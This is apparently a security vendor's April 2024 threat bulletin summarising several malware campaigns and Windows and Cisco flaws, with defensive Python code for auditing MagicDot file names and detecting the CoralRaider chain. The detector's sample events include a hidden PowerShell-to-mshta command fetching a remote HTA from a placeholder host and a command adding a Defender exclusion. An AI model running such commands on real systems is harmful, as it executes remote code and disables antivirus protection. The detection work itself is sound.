
Threat Pulse – April 2024

Each month, DigitalXRAID’s Security Operations Centre (SOC) analysts share the top threats affecting businesses globally. Take action to protect your organisation against these prolific threats. 

If you’ve been affected by any of these threats, we’re here to help. You can call our Cyber Emergency line any time of the day or night for help with active cyberattacks.

DigitalXRAID’s SOC analysts constantly monitor for zero-day threats and update our signature databases using the largest Open Threat Exchange database available. 

FakeBat Malware Distributed via Fake Browser Updates

A recent malware campaign has been uncovered that uses fake browser update notifications to distribute the FakeBat loader.

The campaign relies on social engineering: malicious JavaScript injected into compromised websites triggers deceptive update prompts. These prompts mimic legitimate browser updates, personalised to match the visitor's browser type and language settings, and ultimately serve a malicious MSIX payload signed with a previously used ConsoneAI signature.

The attack uses a multi-stage infection chain, server-side logic that controls when the malicious page is exposed, and Pastebin links hosting anti-analysis code.

Researchers Uncover Windows Flaws Granting Hackers Rootkit-Like Powers 

New research highlights that the DOS-to-NT conversion process could be exploited by threat actors to gain rootkit-like capabilities to conceal and impersonate files, directories, and processes.  

SafeBreach researcher Or Yair revealed at Black Hat Asia that during this conversion, a known issue exists where trailing dots and spaces are removed from paths, enabling what are called MagicDot paths.  

These paths allow unprivileged users to carry out malicious actions without admin permissions, such as hiding files and processes and interfering with file analysis. The research also led to the discovery of security vulnerabilities, three of which have been addressed by Microsoft: an elevation-of-privilege deletion and write vulnerability, a remote code execution vulnerability, and a denial-of-service vulnerability affecting Process Explorer.
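The defensive check a practitioner would want here is to compare what a directory actually contains at the NT level with what Win32 tooling will show after the conversion described above. The audit below is an added example, not part of the original bulletin: it models only the trailing-dot and trailing-space stripping the research describes (not every Win32 normalisation rule) and runs on a constructed list of names.

```python
import re
from dataclasses import dataclass

# Simplified model of the Win32 (DOS-to-NT) conversion: trailing dots and
# spaces are stripped from the final path component. Constructed for this
# example; it does not reproduce other Win32 rules such as 8.3 short names.
TRAILING_DOTS_SPACES = re.compile(r"[. ]+$")


def win32_normalise_name(nt_name: str) -> str:
    """Return the name a Win32 tool would display or open for an NT-level name."""
    stripped = TRAILING_DOTS_SPACES.sub("", nt_name)
    # A segment made only of dots (e.g. "...") is not trimmed by Win32 and is
    # a valid, un-normalised name, so leave it untouched.
    return stripped if stripped else nt_name


@dataclass
class Finding:
    nt_name: str      # name as stored on disk (what native/NT APIs return)
    win32_name: str   # name Win32 tooling will render it under
    reason: str


def audit_directory(nt_names: list[str]) -> list[Finding]:
    """Flag NT-level entries that Win32 tooling renders under a different name.

    Such names cannot be created through normal Win32 file APIs, so their
    presence is itself a signal; a collision with a legitimate entry means the
    entry will be misattributed (the impersonation case in the research).
    """
    findings = []
    for name in nt_names:
        shown = win32_normalise_name(name)
        if shown == name:
            continue
        reason = "trailing dots/spaces stripped by Win32 conversion"
        if shown in nt_names:
            reason = f"impersonates legitimate entry '{shown}'"
        findings.append(Finding(name, shown, reason))
    return findings


if __name__ == "__main__":
    # Constructed directory listing; the trailing '.' and ' ' are the point.
    for f in audit_directory(["svchost.exe", "svchost.exe.", "notes.txt ", "readme.md"]):
        print(f"{f.nt_name!r} -> {f.win32_name!r}: {f.reason}")
```

Listings must come from an API that does not itself normalise names (the NT layer or a raw directory enumeration); a listing taken through ordinary Win32 tooling will already have hidden the difference.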

New ‘Brokewell’ Android Malware Spread Through Fake Browser Updates 

Fake browser updates are being used to push a previously undocumented Android malware called Brokewell that can capture every event on the device, from touches and information displayed, to text input and the applications the user launches. Brokewell is under active development and features a mix of extensive device takeover and remote control capabilities. 

The malware can bypass the restrictions Google introduced in Android 13 and later to prevent side-loaded apps (APKs) from abusing the Accessibility Service. Google has confirmed that Google Play Protect automatically protects users against known versions of this malware, so keeping Play Protect enabled is recommended.

State-Sponsored Espionage Campaign Targets Cisco ASA Vulnerabilities

A state-sponsored threat actor tracked as UAT4356 has launched a sophisticated cyberattack against Cisco Adaptive Security Appliances (ASA) using vulnerabilities first discovered in January 2024.

The threat actor deployed two backdoor components, Line Runner and Line Dancer. Line Runner is a persistent HTTP-based Lua implant on the Cisco ASA, while Line Dancer allows the upload and execution of arbitrary shellcode payloads. The vulnerabilities targeted were the denial-of-service vulnerability CVE-2024-20353 and the local code execution vulnerability CVE-2024-20359.

CoralRaider Threat Actor uses CDN cache to push out info-stealer malware 

A new malicious campaign by the group CoralRaider has been uncovered that aims to spread the info-stealers Cryptbot, Rhadamanthys, and LummaC2 using a multi-stage infection chain.

The attack starts with a malicious Windows shortcut file (.LNK) spread through phishing emails. The LNK file contains PowerShell code that locates and executes mshta.exe to run an HTML Application (HTA) file hosted on the attacker's CDN domain. This triggers a loader that drops and executes two batch scripts: one adds "ProgramData" to the Windows Defender exclusion list, and the other starts the information stealer.
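Two steps in this chain leave unambiguous traces in process-creation telemetry: mshta.exe spawned by PowerShell with a remote URL, and a Defender exclusion being added for ProgramData. The detection logic below is an added example, not part of the original bulletin or of any vendor's product; it runs over constructed events modelled on Sysmon Event ID 1 fields, and the CDN hostname is a placeholder, not a real indicator.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style). The domain
# is a placeholder; nothing here is a real IoC from the campaign.
SAMPLE_EVENTS = [
    {"pid": 101, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    {"pid": 102, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell.exe -w hidden -c "mshta https://cdn.example-placeholder.invalid/inv.hta"'},
    {"pid": 103, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "mshta https://cdn.example-placeholder.invalid/inv.hta"},
    {"pid": 104, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'powershell -c "Add-MpPreference -ExclusionPath C:\\ProgramData"'},
    # Benign control: a local HTA opened from Explorer should not fire rule 1.
    {"pid": 105, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta C:\Users\alice\AppData\Local\vendor\setup.hta"},
]

# Rule 1: mshta given an http(s) URL, i.e. an HTA fetched from a remote host.
REMOTE_HTA = re.compile(r"\bmshta(?:\.exe)?\b.*\bhttps?://", re.IGNORECASE)
# Rule 2: Defender exclusion path added for ProgramData via the MpPreference cmdlets.
DEFENDER_EXCLUSION = re.compile(
    r"(Add|Set)-MpPreference\b.*-ExclusionPath\b.*ProgramData", re.IGNORECASE)


def detect(events):
    """Return (pid, description) for events matching either stage of the chain."""
    alerts = []
    for ev in events:
        image = ev["image"].lower()
        parent = ev["parent_image"].lower()
        cmd = ev["cmdline"]
        if (image.endswith("mshta.exe") and parent.endswith("powershell.exe")
                and REMOTE_HTA.search(cmd)):
            alerts.append((ev["pid"], "powershell -> mshta fetching a remote HTA"))
        elif DEFENDER_EXCLUSION.search(cmd):
            alerts.append((ev["pid"], "Defender exclusion added for ProgramData"))
    return alerts


if __name__ == "__main__":
    for pid, why in detect(SAMPLE_EVENTS):
        print(f"ALERT pid={pid}: {why}")
```

Rule 2 also fires on the equivalent command issued from an elevated shell by an administrator, so in production it is scoped to parent processes that are not an approved management tool.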

Windows Script Files Exploited in Latest Raspberry Robin Malware Attack 

Cybersecurity researchers have uncovered a new wave of the Raspberry Robin malware campaign, previously known for spreading through USB drives, now employing malicious Windows Script Files (WSFs). Raspberry Robin has evolved into a downloader for various payloads including SocGholish, Cobalt Strike, and ransomware. 

DigitalXRAID exists to ensure that the bad guys don’t win. We’re driven and motivated to protect customers. Our expertise and unrivalled service means we can take care of your security, whilst you take care of business.    

Talk to the team to see how you can start protecting your business against cyberattacks today. 
